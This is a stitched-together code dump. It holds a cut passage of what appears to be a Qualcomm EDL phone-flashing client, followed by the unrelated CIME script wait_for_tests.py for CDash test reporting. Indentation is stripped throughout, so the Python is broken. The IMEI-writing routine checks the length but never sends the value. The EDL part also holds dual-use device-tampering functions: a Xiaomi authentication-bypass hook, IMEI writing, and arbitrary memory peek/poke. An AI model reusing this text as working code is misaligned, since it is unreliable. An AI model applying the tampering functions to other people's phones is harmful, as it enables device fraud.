"MemoryName=\"eMMC\" MaxPayloadSizeFromTargetInBytes=\"4096\" MaxPayloadSizeToTargetInBytes=\"1048576\" " \
"MaxPayloadSizeToTargetInBytesSupported=\"1048576\" MaxXMLSizeInBytes=\"4096\" Version=\"1\"
TargetName=\"8953\" />" \
"</data>"
'''
rsp = self.xmlsend(connectcmd)
if len(rsp) > 1:
if not rsp[0]:
if b"Only nop and sig tag can be" in rsp[2]:
self.info("Xiaomi EDL Auth detected.")
try:
self.modules = modules(fh=self, serial=self.serial,
supported_functions=self.supported_functions,
loglevel=self.__logger.level,
devicemodel=self.devicemodel, args=self.args)
except Exception as err: # pylint: disable=broad-except
self.modules = None
if self.modules.edlauth():
rsp = self.xmlsend(connectcmd)
if len(rsp) > 1:
if rsp[0] and rsp[1] != {}: # On Ack
info = self.cdc.read(self.cfg.MaxXMLSizeInBytes)
if "MemoryName" not in rsp[1]:
# print(rsp[1])
rsp[1]["MemoryName"] = "eMMC"
if "MaxXMLSizeInBytes" not in rsp[1]:
rsp[1]["MaxXMLSizeInBytes"] = "4096"
self.warning("Couldn't detect MaxPayloadSizeFromTargetinBytes")
if "MaxPayloadSizeToTargetInBytes" not in rsp[1]:
rsp[1]["MaxPayloadSizeToTargetInBytes"] = "1038576"
if "MaxPayloadSizeToTargetInBytesSupported" not in rsp[1]:
rsp[1]["MaxPayloadSizeToTargetInBytesSupported"] = "1038576"
if rsp[1]["MemoryName"].lower() != self.cfg.MemoryName.lower():
self.warning("Memory type was set as " + self.cfg.MemoryName + " but device reported it is " +
rsp[1]["MemoryName"] + " instead.")
self.cfg.MemoryName = rsp[1]["MemoryName"]
self.cfg.MaxPayloadSizeToTargetInBytes = int(rsp[1]["MaxPayloadSizeToTargetInBytes"])
self.cfg.MaxPayloadSizeToTargetInBytesSupported = int(rsp[1]["MaxPayloadSizeToTargetInBytesSupported"])
self.cfg.MaxXMLSizeInBytes = int(rsp[1]["MaxXMLSizeInBytes"])
if "MaxPayloadSizeFromTargetInBytes" in rsp[1]:
self.cfg.MaxPayloadSizeFromTargetInBytes = int(rsp[1]["MaxPayloadSizeFromTargetInBytes"])
else:
self.cfg.MaxPayloadSizeFromTargetInBytes = self.cfg.MaxXMLSizeInBytes
self.warning("Couldn't detect MaxPayloadSizeFromTargetinBytes")
if "TargetName" in rsp[1]:
self.cfg.TargetName = rsp[1]["TargetName"]
if "MSM" not in self.cfg.TargetName:
self.cfg.TargetName = "MSM" + self.cfg.TargetName
else:
self.cfg.TargetName = "Unknown"
self.warning("Couldn't detect TargetName")
if "Version" in rsp[1]:
self.cfg.Version = rsp[1]["Version"]
else:
self.cfg.Version = 0
self.warning("Couldn't detect Version")
else: # on NAK
if b"ERROR" in rsp[2]:
self.error(rsp[2].decode('utf-8'))
sys.exit()
if "MaxPayloadSizeToTargetInBytes" in rsp[1]:
try:
self.cfg.MemoryName = rsp[1]["MemoryName"]
self.cfg.MaxPayloadSizeToTargetInBytes = int(rsp[1]["MaxPayloadSizeToTargetInBytes"])
self.cfg.MaxPayloadSizeToTargetInBytesSupported = int(
rsp[1]["MaxPayloadSizeToTargetInBytesSupported"])
self.cfg.MaxXMLSizeInBytes = int(rsp[1]["MaxXMLSizeInBytes"])
self.cfg.MaxPayloadSizeFromTargetInBytes = int(rsp[1]["MaxPayloadSizeFromTargetInBytes"])
self.cfg.TargetName = rsp[1]["TargetName"]
if "MSM" not in self.cfg.TargetName:
self.cfg.TargetName = "MSM" + self.cfg.TargetName
self.cfg.Version = rsp[1]["Version"]
if lvl == 0:
return self.configure(lvl + 1)
else:
self.error(f"Error:{rsp}")
sys.exit()
except Exception as e:
pass
self.info(f"TargetName={self.cfg.TargetName}")
self.info(f"MemoryName={self.cfg.MemoryName}")
self.info(f"Version={self.cfg.Version}")
rsp = self.cmd_read_buffer(0, 1, 1, False)
if rsp == b"" and self.args["--memory"] is None:
if b"Failed to open the SDCC Device" in self.lasterror:
self.warning(
"Memory type eMMC doesn't seem to match (Failed to init). Trying to use UFS instead.")
self.cfg.MemoryName = "UFS"
return self.configure(0)
if b"ERROR: Failed to initialize (open whole lun) UFS Device slot" in self.lasterror:
self.warning(
"Memory type UFS doesn't seem to match (Failed to init). Trying to use eMMC instead.")
self.cfg.MemoryName = "eMMC"
return self.configure(0)
elif b"Attribute \'SECTOR_SIZE_IN_BYTES\'=4096 must be equal to disk sector size 512" in self.lasterror:
self.cfg.SECTOR_SIZE_IN_BYTES = 512
elif b"Attribute \'SECTOR_SIZE_IN_BYTES\'=512 must be equal to disk sector size 4096" in self.lasterror:
self.cfg.SECTOR_SIZE_IN_BYTES = 4096
self.luns = self.getluns(self.args)
return True
def getlunsize(self, lun):
if lun not in self.lunsizes:
try:
data, guid_gpt = self.get_gpt(lun, int(self.args["--gpt-num-part-entries"]),
int(self.args["--gpt-part-entry-size"]),
int(self.args["--gpt-part-entry-start-lba"]))
self.lunsizes[lun] = guid_gpt.totalsectors
except Exception as e:
self.error(e)
return -1
else:
return self.lunsizes[lun]
return guid_gpt.totalsectors
def get_supported_functions(self):
supfunc = False
info = self.cmd_nop()
if not info:
self.info("No supported functions detected, configuring qc generic commands")
self.supported_functions = ['configure', 'program', 'firmwarewrite', 'patch', 'setbootablestoragedrive',
'ufs', 'emmc', 'power', 'benchmark', 'read', 'getstorageinfo',
'getcrc16digest', 'getsha256digest', 'erase', 'peek', 'poke', 'nop', 'xml']
else:
self.supported_functions = []
for line in info:
if "chip serial num" in line.lower():
self.info(line)
try:
serial = line.split("0x")[1][:-1]
self.serial = int(serial, 16)
except Exception as err: # pylint: disable=broad-except
self.debug(str(err))
serial = line.split(": ")[2]
self.serial = int(serial.split(" ")[0])
if supfunc and "end of supported functions" not in line.lower():
rs = line.replace("\n", "")
if rs != "":
rs = rs.replace("INFO: ", "")
self.supported_functions.append(rs)
if "supported functions" in line.lower():
supfunc = True
if len(self.supported_functions) > 1:
info = "Supported Functions: "
for line in self.supported_functions:
info += line + ","
self.info(info[:-1])
data = self.cdc.read(self.cfg.MaxXMLSizeInBytes) # logbuf
try:
self.info(data.decode('utf-8'))
except Exception as err: # pylint: disable=broad-except
self.debug(str(err))
pass
if not self.supported_functions:
self.supported_functions = ['configure', 'program', 'firmwarewrite', 'patch', 'setbootablestoragedrive',
'ufs', 'emmc', 'power', 'benchmark', 'read', 'getstorageinfo',
'getcrc16digest', 'getsha256digest', 'erase', 'peek', 'poke', 'nop', 'xml']
def connect(self):
v = b'-1'
if platform.system() == 'Windows':
self.cdc.timeout = 50
elif platform.system() == 'Darwin':
# must ensure the timeout is enough to fill the buffer we alloc
# which is 1MB, othwise some data are dropped in the underlying usb libraries
self.cdc.timeout = 50
else:
self.cdc.timeout = 50
info = []
while v != b'':
try:
v = self.cdc.read(self.cfg.MaxXMLSizeInBytes)
if v == b'':
break
data = self.xml.getlog(v)
if len(data) > 0:
info.append(data[0])
if not info:
break
except Exception as err: # pylint: disable=broad-except
pass
if info == [] or (len(info) > 0 and 'ERROR' in info[0]):
if len(info) > 0:
self.debug(info[0])
if self.serial is None or self.supported_functions is []:
try:
if os.path.exists("edl_config.json"):
pinfo = json.loads(open("edl_config.json", "rb").read())
if self.supported_functions == []:
if "supported_functions" in pinfo:
self.supported_functions = pinfo["supported_functions"]
if self.serial is None:
if "serial" in pinfo:
self.serial = pinfo["serial"]
else:
self.get_supported_functions()
except:
self.get_supported_functions()
pass
else:
supfunc = False
for line in info:
if "chip serial num" in line.lower():
self.info(line)
try:
serial = line.split("0x")[1][:-1]
self.serial = int(serial, 16)
except Exception as err: # pylint: disable=broad-except
self.debug(str(err))
serial = line.split(": ")[2]
self.serial = int(serial.split(" ")[0])
if supfunc and "end of supported functions" not in line.lower():
rs = line.replace("\n", "")
if rs != "":
rs = rs.replace("INFO: ", "")
self.supported_functions.append(rs)
if "supported functions" in line.lower():
supfunc = True
try:
if os.path.exists(self.cfg.programmer):
data = open(self.cfg.programmer, "rb").read()
for cmd in [b"demacia", b"setprojmodel", b"setswprojmodel", b"setprocstart", b"SetNetType"]:
if cmd in data:
self.supported_functions.append(cmd.decode('utf-8'))
state = {
"supported_functions": self.supported_functions,
"programmer": self.cfg.programmer,
"serial": self.serial
}
open("edl_config.json", "w").write(json.dumps(state))
except:
pass
# rsp = self.xmlsend(data, self.skipresponse)
if "getstorageinfo" in self.supported_functions and self.args["--memory"] is None:
storageinfo = self.cmd_getstorageinfo()
if storageinfo is not None and storageinfo != []:
for info in storageinfo:
if "storage_info" in info:
try:
si = json.loads(info)["storage_info"]
except Exception as err: # pylint: disable=broad-except
self.debug(str(err))
continue
self.info("Storage report:")
for sii in si:
self.info(f"{sii}:{si[sii]}")
if "total_blocks" in si:
self.cfg.total_blocks = si["total_blocks"]
if "block_size" in si:
self.cfg.block_size = si["block_size"]
if "page_size" in si:
self.cfg.SECTOR_SIZE_IN_BYTES = si["page_size"]
if "mem_type" in si:
self.cfg.MemoryName = si["mem_type"]
if "prod_name" in si:
self.cfg.prod_name = si["prod_name"]
if "UFS Inquiry Command Output:" in info:
self.cfg.prod_name = info.split("Output: ")[1]
self.info(info)
if "UFS Erase Block Size:" in info:
self.cfg.block_size = int(info.split("Size: ")[1], 16)
self.info(info)
if "UFS Boot" in info:
self.cfg.MemoryName = "UFS"
self.cfg.SECTOR_SIZE_IN_BYTES = 4096
if "UFS Boot Partition Enabled: " in info:
self.info(info)
if "UFS Total Active LU: " in info:
self.cfg.maxlun = int(info.split("LU: ")[1], 16)
return self.supported_functions
# OEM Stuff here below --------------------------------------------------
def cmd_writeimei(self, imei):
if len(imei) != 16:
self.info("IMEI must be 16 digits")
return False
data = "<?xml version=\"1.0\" ?><data><writeIMEI len=\"16\"/></data>"
val = self.xmlsend(data)
if val[0]:
self.info("writeIMEI succeeded.")
return True
else:
self.error("writeIMEI failed.")
return False
def cmd_getstorageinfo(self):
data = "<?xml version=\"1.0\" ?><data><getstorageinfo physical_partition_number=\"0\"/></data>"
val = self.xmlsend(data)
if val[0]:
try:
data = self.xml.getlog(val[2])
return data
except: # pylint: disable=broad-except
return None
else:
self.warning("GetStorageInfo command isn't supported.")
return None
def cmd_test(self, cmd):
token = "1234"
pk = "1234"
data = "<?xml version=\"1.0\" ?>\n<data>\n<" + cmd + " token=\"" + token + "\" pk=\"" + pk + "\" />\n</data>"
val = self.xmlsend(data)
if len(val) > 1:
if b"raw hex token" in val[2]:
return True
if b"opcmd is not enabled" in val[2]:
return True
return False
def cmd_getstorageinfo_string(self):
data = "<?xml version=\"1.0\" ?><data><getstorageinfo /></data>"
val = self.xmlsend(data)
if val[0]:
self.info(f"GetStorageInfo:\n--------------------\n")
data = self.xml.getlog(val[2])
for line in data:
self.info(line)
return True
else:
self.warning("GetStorageInfo command isn't supported.")
return False
def cmd_poke(self, address, data, filename="", info=False):
rf = None
if filename != "":
rf = open(filename, "rb")
SizeInBytes = os.stat(filename).st_size
else:
SizeInBytes = len(data)
if info:
self.info(f"Poke: Address({hex(address)}),Size({hex(SizeInBytes)})")
'''
<?xml version="1.0" ?><data><poke address64="1048576" SizeInBytes="90112" value="0x22 0x00 0x00"/></data>
'''
maxsize = 8
lengthtowrite = SizeInBytes
if lengthtowrite < maxsize:
maxsize = lengthtowrite
pos = 0
old = 0
datawritten = 0
mode = 0
if info:
print_progress(0, 100, prefix='Progress:', suffix='Complete', bar_length=50)
while lengthtowrite > 0:
if rf is not None:
content = hex(int(hexlify(rf.read(maxsize)).decode('utf-8'), 16))
else:
content = 0
if lengthtowrite < maxsize:
maxsize = lengthtowrite
for i in range(0, maxsize):
content = (content << 8) + int(
hexlify(data[pos + maxsize - i - 1:pos + maxsize - i]).decode('utf-8'), 16)
# content=hex(int(hexlify(data[pos:pos+maxsize]).decode('utf-8'),16))
content = hex(content)
if mode == 0:
xdata = f"<?xml version=\"1.0\" ?><data><poke address64=\"{str(address + pos)}\" " + \
f"size_in_bytes=\"{str(maxsize)}\" value64=\"{content}\" /></data>\n"
else:
xdata = f"<?xml version=\"1.0\" ?><data><poke address64=\"{str(address + pos)}\" " + \
f"SizeInBytes=\"{str(maxsize)}\" value64=\"{content}\" /></data>\n"
try:
self.cdc.write(xdata[:self.cfg.MaxXMLSizeInBytes])
except Exception as e: # pylint: disable=broad-except
self.debug(str(e))
pass
addrinfo = self.cdc.read(self.cfg.MaxXMLSizeInBytes)
if b"SizeInBytes" in addrinfo or b"Invalid parameters" in addrinfo:
tmp = b""
while b"NAK" not in tmp and b"ACK" not in tmp:
tmp += self.cdc.read(self.cfg.MaxXMLSizeInBytes)
xdata = f"<?xml version=\"1.0\" ?><data><poke address64=\"{str(address + pos)}\" " + \
f"SizeInBytes=\"{str(maxsize)}\" value64=\"{content}\" /></data>\n"
self.cdc.write(xdata[:self.cfg.MaxXMLSizeInBytes])
addrinfo = self.cdc.read(self.cfg.MaxXMLSizeInBytes)
if (b'<response' in addrinfo and 'NAK' in addrinfo) or b"Invalid parameters" in addrinfo:
self.error(f"Error:{addrinfo}")
return False
if b"address" in addrinfo and b"can\'t" in addrinfo:
tmp = b""
while b"NAK" not in tmp and b"ACK" not in tmp:
tmp += self.cdc.read(self.cfg.MaxXMLSizeInBytes)
self.error(f"Error:{addrinfo}")
return False
addrinfo = self.cdc.read(self.cfg.MaxXMLSizeInBytes)
if b'<response' in addrinfo and b'NAK' in addrinfo:
print(f"Error:{addrinfo}")
return False
pos += maxsize
datawritten += maxsize
lengthtowrite -= maxsize
if info:
prog = round(float(datawritten) / float(SizeInBytes) * float(100), 1)
if prog > old:
print_progress(prog, 100, prefix='Progress:', suffix='Complete', bar_length=50)
old = prog
if info:
self.info("Done writing.")
return True
def cmd_peek(self, address, SizeInBytes, filename="", info=False):
if info:
self.info(f"Peek: Address({hex(address)}),Size({hex(SizeInBytes)})")
wf = None
if filename != "":
wf = open(filename, "wb")
'''
<?xml version="1.0" ?><data><peek address64="1048576" SizeInBytes="90112" /></data>
'''
data = f"<?xml version=\"1.0\" ?><data><peek address64=\"{address}\" " + \
f"size_in_bytes=\"{SizeInBytes}\" /></data>\n"
'''
<?xml version="1.0" encoding="UTF-8" ?><data><log value="Using address 00100000" /></data>
<?xml version="1.0" encoding="UTF-8" ?><data><log value="0x22 0x00 0x00 0xEA 0x70 0x00 0x00 0xEA 0x74 0x00
0x00 0xEA 0x78 0x00 0x00 0xEA 0x7C 0x00 0x00 0xEA 0x80 0x00 0x00 0xEA 0x84 0x00 0x00 0xEA 0x88 0x00 0x00
0xEA 0xFE 0xFF 0xFF 0xEA 0xFE 0xFF 0xFF 0xEA 0xFE 0xFF 0xFF 0xEA 0xFE 0xFF 0xFF 0xEA 0xFE 0xFF 0xFF 0xEA
0xFE 0xFF 0xFF 0xEA 0xFE 0xFF 0xFF 0xEA 0xFE 0xFF 0xFF 0xEA 0xFE 0xFF 0xFF 0xEA 0xFE 0xFF 0xFF 0xEA 0xFE
0xFF 0xFF 0xEA 0xFE 0xFF 0xFF 0xEA 0xFE 0xFF 0xFF 0xEA 0xFE 0xFF 0xFF 0xEA 0xFE 0xFF 0xFF 0xEA 0xFE 0xFF
0xFF 0xEA 0xFE 0xFF 0xFF 0xEA 0xFE 0xFF " /></data>
'''
try:
self.cdc.write(data[:self.cfg.MaxXMLSizeInBytes])
except Exception as err: # pylint: disable=broad-except
self.debug(str(err))
pass
addrinfo = self.cdc.read(self.cfg.MaxXMLSizeInBytes)
if b"SizeInBytes" in addrinfo or b"Invalid parameters" in addrinfo:
tmp = b""
while b"NAK" not in tmp and b"ACK" not in tmp:
tmp += self.cdc.read(self.cfg.MaxXMLSizeInBytes)
data = f"<?xml version=\"1.0\" ?><data><peek address64=\"{hex(address)}\" " + \
f"SizeInBytes=\"{hex(SizeInBytes)}\" /></data>"
self.cdc.write(data[:self.cfg.MaxXMLSizeInBytes])
addrinfo = self.cdc.read(self.cfg.MaxXMLSizeInBytes)
if (b'<response' in addrinfo and 'NAK' in addrinfo) or b"Invalid parameters" in addrinfo:
self.error(f"Error:{addrinfo}")
return False
if b"address" in addrinfo and b"can\'t" in addrinfo:
tmp = b""
while b"NAK" not in tmp and b"ACK" not in tmp:
tmp += self.cdc.read(self.cfg.MaxXMLSizeInBytes)
self.error(f"Error:{addrinfo}")
return False
resp = b""
dataread = 0
old = 0
if info:
print_progress(0, 100, prefix='Progress:', suffix='Complete', bar_length=50)
while True:
tmp = self.cdc.read(self.cfg.MaxXMLSizeInBytes)
if b'<response' in tmp or b"ERROR" in tmp:
break
rdata = self.xml.getlog(tmp)[0].replace("0x", "").replace(" ", "")
tmp2 = b""
try:
tmp2 = binascii.unhexlify(rdata)
except: # pylint: disable=broad-except
print(rdata)
exit(0)
dataread += len(tmp2)
if wf is not None:
wf.write(tmp2)
else:
resp += tmp2
if info:
prog = round(float(dataread) / float(SizeInBytes) * float(100), 1)
if prog > old:
print_progress(prog, 100, prefix='Progress:', suffix='Complete', bar_length=50)
old = prog
if wf is not None:
wf.close()
if b'<response' in tmp and b'ACK' in tmp:
if info:
self.info(f"Bytes from {hex(address)}, bytes read {hex(dataread)}, written to {filename}.")
return True
else:
self.error(f"Error:{addrinfo}")
return False
else:
return resp
def cmd_memcpy(self, destaddress, sourceaddress, size):
data = self.cmd_peek(sourceaddress, size)
if data != b"" and data:
if self.cmd_poke(destaddress, data):
return True
return False
def cmd_rawxml(self, data, response=True):
if response:
val = self.xmlsend(data)
if val[0]:
self.info(f"{data} succeeded.")
return val[2]
else:
self.error(f"{data} failed.")
self.error(f"{val[2]}")
return False
else:
self.xmlsend(data, False)
return True
|
wait_for_tests.py
|
#pylint: disable=import-error
from six.moves import queue
import os, time, threading, socket, signal, shutil, glob
#pylint: disable=import-error
from distutils.spawn import find_executable
import logging
import xml.etree.ElementTree as xmlet
import CIME.utils
from CIME.utils import expect, Timeout, run_cmd_no_fail, safe_copy, CIMEError
from CIME.XML.machines import Machines
from CIME.test_status import *
from CIME.provenance import save_test_success
from CIME.case.case import Case
SIGNAL_RECEIVED = False
E3SM_MAIN_CDASH = "E3SM"
CDASH_DEFAULT_BUILD_GROUP = "ACME_Latest"
SLEEP_INTERVAL_SEC = .1
###############################################################################
def signal_handler(*_):
###############################################################################
global SIGNAL_RECEIVED
SIGNAL_RECEIVED = True
###############################################################################
def set_up_signal_handlers():
###############################################################################
signal.signal(signal.SIGTERM, signal_handler)
signal.signal(signal.SIGINT, signal_handler)
###############################################################################
def get_test_time(test_path):
###############################################################################
ts = TestStatus(test_dir=test_path)
comment = ts.get_comment(RUN_PHASE)
if comment is None or "time=" not in comment:
logging.warning("No run-phase time data found in {}".format(test_path))
return 0
else:
time_data = [token for token in comment.split() if token.startswith("time=")][0]
return int(time_data.split("=")[1])
###############################################################################
def get_test_output(test_path):
###############################################################################
output_file = os.path.join(test_path, "TestStatus.log")
if (os.path.exists(output_file)):
return open(output_file, 'r').read()
else:
logging.warning("File '{}' not found".format(output_file))
return ""
###############################################################################
def create_cdash_xml_boiler(phase, cdash_build_name, cdash_build_group, utc_time, current_time, hostname, git_commit):
###############################################################################
site_elem = xmlet.Element("Site")
if ("JENKINS_START_TIME" in os.environ):
time_info_str = "Total testing time: {:d} seconds".format(int(current_time) - int(os.environ["JENKINS_START_TIME"]))
else:
time_info_str = ""
site_elem.attrib["BuildName"] = cdash_build_name
site_elem.attrib["BuildStamp"] = "{}-{}".format(utc_time, cdash_build_group)
site_elem.attrib["Name"] = hostname
site_elem.attrib["OSName"] = "Linux"
site_elem.attrib["Hostname"] = hostname
site_elem.attrib["OSVersion"] = "Commit: {}{}".format(git_commit, time_info_str)
phase_elem = xmlet.SubElement(site_elem, phase)
xmlet.SubElement(phase_elem, "StartDateTime").text = time.ctime(current_time)
xmlet.SubElement(phase_elem, "Start{}Time".format("Test" if phase == "Testing" else phase)).text = str(int(current_time))
return site_elem, phase_elem
###############################################################################
def create_cdash_config_xml(results, cdash_build_name, cdash_build_group, utc_time, current_time, hostname, data_rel_path, git_commit):
###############################################################################
site_elem, config_elem = create_cdash_xml_boiler("Configure", cdash_build_name, cdash_build_group, utc_time, current_time, hostname, git_commit)
xmlet.SubElement(config_elem, "ConfigureCommand").text = "namelists"
config_results = []
for test_name in sorted(results):
test_status = results[test_name][1]
config_results.append("{} {} Config {}".format("" if test_status != NAMELIST_FAIL_STATUS else "CMake Warning:\n", test_name, "PASS" if test_status != NAMELIST_FAIL_STATUS else "NML DIFF"))
xmlet.SubElement(config_elem, "Log").text = "\n".join(config_results)
xmlet.SubElement(config_elem, "ConfigureStatus").text = "0"
xmlet.SubElement(config_elem, "ElapsedMinutes").text = "0" # Skip for now
etree = xmlet.ElementTree(site_elem)
etree.write(os.path.join(data_rel_path, "Configure.xml"))
###############################################################################
def create_cdash_build_xml(results, cdash_build_name, cdash_build_group, utc_time, current_time, hostname, data_rel_path, git_commit):
###############################################################################
site_elem, build_elem = create_cdash_xml_boiler("Build", cdash_build_name, cdash_build_group, utc_time, current_time, hostname, git_commit)
xmlet.SubElement(build_elem, "ConfigureCommand").text = "case.build"
build_results = []
for test_name in sorted(results):
build_results.append(test_name)
xmlet.SubElement(build_elem, "Log").text = "\n".join(build_results)
for idx, test_name in enumerate(sorted(results)):
test_path = results[test_name][0]
test_norm_path = test_path if os.path.isdir(test_path) else os.path.dirname(test_path)
if get_test_time(test_norm_path) == 0:
error_elem = xmlet.SubElement(build_elem, "Error")
xmlet.SubElement(error_elem, "Text").text = test_name
xmlet.SubElement(error_elem, "BuildLogLine").text = str(idx)
xmlet.SubElement(error_elem, "PreContext").text = test_name
xmlet.SubElement(error_elem, "PostContext").text = ""
xmlet.SubElement(error_elem, "RepeatCount").text = "0"
xmlet.SubElement(build_elem, "ElapsedMinutes").text = "0" # Skip for now
etree = xmlet.ElementTree(site_elem)
etree.write(os.path.join(data_rel_path, "Build.xml"))
###############################################################################
def create_cdash_test_xml(results, cdash_build_name, cdash_build_group, utc_time, current_time, hostname, data_rel_path, git_commit):
###############################################################################
site_elem, testing_elem = create_cdash_xml_boiler("Testing", cdash_build_name, cdash_build_group, utc_time, current_time, hostname, git_commit)
test_list_elem = xmlet.SubElement(testing_elem, "TestList")
for test_name in sorted(results):
xmlet.SubElement(test_list_elem, "Test").text = test_name
for test_name in sorted(results):
test_path, test_status = results[test_name]
test_passed = test_status in [TEST_PASS_STATUS, NAMELIST_FAIL_STATUS]
test_norm_path = test_path if os.path.isdir(test_path) else os.path.dirname(test_path)
full_test_elem = xmlet.SubElement(testing_elem, "Test")
if test_passed:
full_test_elem.attrib["Status"] = "passed"
elif (test_status == TEST_PEND_STATUS):
full_test_elem.attrib["Status"] = "notrun"
else:
full_test_elem.attrib["Status"] = "failed"
xmlet.SubElement(full_test_elem, "Name").text = test_name
xmlet.SubElement(full_test_elem, "Path").text = test_norm_path
xmlet.SubElement(full_test_elem, "FullName").text = test_name
xmlet.SubElement(full_test_elem, "FullCommandLine")
# text ?
results_elem = xmlet.SubElement(full_test_elem, "Results")
named_measurements = (
("text/string", "Exit Code", test_status),
("text/string", "Exit Value", "0" if test_passed else "1"),
("numeric_double", "Execution Time", str(get_test_time(test_norm_path))),
("text/string", "Completion Status", "Not Completed" if test_status == TEST_PEND_STATUS else "Completed"),
("text/string", "Command line", "create_test")
)
for type_attr, name_attr, value in named_measurements:
named_measurement_elem = xmlet.SubElement(results_elem, "NamedMeasurement")
named_measurement_elem.attrib["type"] = type_attr
named_measurement_elem.attrib["name"] = name_attr
xmlet.SubElement(named_measurement_elem, "Value").text = value
measurement_elem = xmlet.SubElement(results_elem, "Measurement")
value_elem = xmlet.SubElement(measurement_elem, "Value")
value_elem.text = ''.join([item for item in get_test_output(test_norm_path) if ord(item) < 128])
xmlet.SubElement(testing_elem, "ElapsedMinutes").text = "0" # Skip for now
etree = xmlet.ElementTree(site_elem)
etree.write(os.path.join(data_rel_path, "Test.xml"))
###############################################################################
def create_cdash_xml_fakes(results, cdash_build_name, cdash_build_group, utc_time, current_time, hostname):
###############################################################################
# We assume all cases were created from the same code repo
first_result_case = os.path.dirname(list(results.items())[0][1][0])
try:
srcroot = run_cmd_no_fail("./xmlquery --value CIMEROOT", from_dir=first_result_case)
except CIMEError:
# Use repo containing this script as last resort
srcroot = CIME.utils.get_cime_root()
git_commit = CIME.utils.get_current_commit(repo=srcroot)
data_rel_path = os.path.join("Testing", utc_time)
create_cdash_config_xml(results, cdash_build_name, cdash_build_group, utc_time, current_time, hostname, data_rel_path, git_commit)
create_cdash_build_xml(results, cdash_build_name, cdash_build_group, utc_time, current_time, hostname, data_rel_path, git_commit)
create_cdash_test_xml(results, cdash_build_name, cdash_build_group, utc_time, current_time, hostname, data_rel_path, git_commit)
###############################################################################
def create_cdash_upload_xml(results, cdash_build_name, cdash_build_group, utc_time, hostname, force_log_upload):
###############################################################################
data_rel_path = os.path.join("Testing", utc_time)
try:
log_dir = "{}_logs".format(cdash_build_name)
need_to_upload = False
for test_name, test_data in results.items():
test_path, test_status = test_data
if test_status not in [TEST_PASS_STATUS, NAMELIST_FAIL_STATUS] or force_log_upload:
test_case_dir = os.path.dirname(test_path)
ts = TestStatus(test_case_dir)
build_status = ts.get_status(SHAREDLIB_BUILD_PHASE)
build_status = TEST_FAIL_STATUS if build_status == TEST_FAIL_STATUS else ts.get_status(MODEL_BUILD_PHASE)
run_status = ts.get_status(RUN_PHASE)
baseline_status = ts.get_status(BASELINE_PHASE)
if build_status == TEST_FAIL_STATUS or run_status == TEST_FAIL_STATUS or baseline_status == TEST_FAIL_STATUS or force_log_upload:
case_dirs = [test_case_dir]
case_base = os.path.basename(test_case_dir)
test_case2_dir = os.path.join(test_case_dir, "case2", case_base)
if os.path.exists(test_case2_dir):
case_dirs.append(test_case2_dir)
for case_dir in case_dirs:
param = "EXEROOT" if build_status == TEST_FAIL_STATUS else "RUNDIR"
log_src_dir = run_cmd_no_fail("./xmlquery {} --value".format(param), from_dir=case_dir)
log_dst_dir = os.path.join(log_dir, "{}{}_{}_logs".format(test_name, "" if case_dir == test_case_dir else ".case2", param))
os.makedirs(log_dst_dir)
for log_file in glob.glob(os.path.join(log_src_dir, "*log*")):
safe_copy(log_file, log_dst_dir)
for log_file in glob.glob(os.path.join(log_src_dir, "*.cprnc.out*")):
safe_copy(log_file, log_dst_dir)
need_to_upload = True
if (need_to_upload):
tarball = "{}.tar.gz".format(log_dir)
if (os.path.exists(tarball)):
os.remove(tarball)
run_cmd_no_fail("tar -cf - {} | gzip -c".format(log_dir), arg_stdout=tarball)
base64 = run_cmd_no_fail("base64 {}".format(tarball))
xml_text = \
r"""<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" href="Dart/Source/Server/XSL/Build.xsl <file:///Dart/Source/Server/XSL/Build.xsl> "?>
<Site BuildName="{}" BuildStamp="{}-{}" Name="{}" Generator="ctest3.0.0">
<Upload>
<File filename="{}">
<Content encoding="base64">
{}
</Content>
</File>
</Upload>
</Site>
""".format(cdash_build_name, utc_time, cdash_build_group, hostname, os.path.abspath(tarball), base64)
with open(os.path.join(data_rel_path, "Upload.xml"), "w") as fd:
fd.write(xml_text)
finally:
if (os.path.isdir(log_dir)):
shutil.rmtree(log_dir)
###############################################################################
def create_cdash_xml(results, cdash_build_name, cdash_project, cdash_build_group, force_log_upload=False):
###############################################################################
#
# Create dart config file
#
current_time = time.time()
utc_time_tuple = time.gmtime(current_time)
cdash_timestamp = time.strftime("%H:%M:%S", utc_time_tuple)
hostname = Machines().get_machine_name()
if (hostname is None):
hostname = socket.gethostname().split(".")[0]
logging.warning("Could not convert hostname '{}' into an E3SM machine name".format(hostname))
dart_config = \
"""
SourceDirectory: {0}
BuildDirectory: {0}
# Site is something like machine.domain, i.e. pragmatic.crd
Site: {1}
# Build name is osname-revision-compiler, i.e. Linux-2.4.2-2smp-c++
BuildName: {2}
# Submission information
IsCDash: TRUE
CDashVersion:
QueryCDashVersion:
DropSite: my.cdash.org
DropLocation: /submit.php?project={3}
DropSiteUser:
DropSitePassword:
DropSiteMode:
DropMethod: http
TriggerSite:
ScpCommand: {4}
# Dashboard start time
NightlyStartTime: {5} UTC
""".format(os.getcwd(), hostname, cdash_build_name, cdash_project,
find_executable("scp"), cdash_timestamp)
with open("DartConfiguration.tcl", "w") as dart_fd:
dart_fd.write(dart_config)
utc_time = time.strftime('%Y%m%d-%H%M', utc_time_tuple)
os.makedirs(os.path.join("Testing", utc_time))
# Make tag file
with open("Testing/TAG", "w") as tag_fd:
tag_fd.write("{}\n{}\n".format(utc_time, cdash_build_group))
create_cdash_xml_fakes(results, cdash_build_name, cdash_build_group, utc_time, current_time, hostname)
create_cdash_upload_xml(results, cdash_build_name, cdash_build_group, utc_time, hostname, force_log_upload)
run_cmd_no_fail("ctest -VV -D NightlySubmit", verbose=True)
###############################################################################
def wait_for_test(test_path, results, wait, check_throughput, check_memory, ignore_namelists, ignore_memleak, no_run):
###############################################################################
if (os.path.isdir(test_path)):
test_status_filepath = os.path.join(test_path, TEST_STATUS_FILENAME)
else:
test_status_filepath = test_path
logging.debug("Watching file: '{}'".format(test_status_filepath))
test_log_path = os.path.join(os.path.dirname(test_status_filepath), ".internal_test_status.log")
# We don't want to make it a requirement that wait_for_tests has write access
# to all case directories
try:
fd = open(test_log_path, "w")
fd.close()
except (IOError, OSError):
test_log_path = "/dev/null"
prior_ts = None
with open(test_log_path, "w") as log_fd:
while (True):
if (os.path.exists(test_status_filepath)):
ts = TestStatus(test_dir=os.path.dirname(test_status_filepath))
test_name = ts.get_name()
test_status = ts.get_overall_test_status(wait_for_run=not no_run, # Important
no_run=no_run,
check_throughput=check_throughput,
check_memory=check_memory, ignore_namelists=ignore_namelists,
ignore_memleak=ignore_memleak)
if prior_ts is not None and prior_ts != ts:
